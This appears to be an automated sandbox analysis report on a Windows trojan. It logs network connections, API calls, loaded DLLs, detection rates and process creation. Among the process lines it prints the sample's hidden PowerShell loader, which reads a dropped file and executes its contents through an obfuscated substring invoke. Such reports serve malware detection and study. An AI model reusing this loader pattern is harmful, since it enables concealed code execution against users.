      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49787 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.5:49798 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49885 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49900 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49917 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49934 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49950 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49968 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50002 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50004 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50006 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50008 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50010 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50012 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50018 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50020 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50022 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50024 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50030 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50034 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50038 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50040 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50042 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50044 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50046 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50050 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50052 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50054 version: TLS 1.2
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040543E

      System Summary

      barindex
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Xjz8dblHDe.exeJump to dropped file
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_00404C7B0_2_00404C7B
      Source: Xjz8dblHDe.exeStatic PE information: invalid certificate
      Source: Xjz8dblHDe.exe, 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs Xjz8dblHDe.exe
      Source: Xjz8dblHDe.exeBinary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs Xjz8dblHDe.exe
      Source: Xjz8dblHDe.exe.1.drBinary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs Xjz8dblHDe.exe
      Source: Xjz8dblHDe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/12@2/2
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046FF
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeFile created: C:\Users\user\AppData\Local\downrangeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4796:120:WilError_03
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeFile created: C:\Users\user\AppData\Local\Temp\nsqC268.tmpJump to behavior
      Source: Xjz8dblHDe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Xjz8dblHDe.exeVirustotal: Detection: 61%
      Source: Xjz8dblHDe.exeReversingLabs: Detection: 70%
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeFile read: C:\Users\user\Desktop\Xjz8dblHDe.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Xjz8dblHDe.exe "C:\Users\user\Desktop\Xjz8dblHDe.exe"
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rapportudskrifter=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Sidelbende.Kar';$Stormogulernes=$Rapportudskrifter.SubString(56424,3);.$Stormogulernes($Rapportudskrifter)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rapportudskrifter=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Sidelbende.Kar';$Stormogulernes=$Rapportudskrifter.SubString(56424,3);.$Stormogulernes($Rapportudskrifter)"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
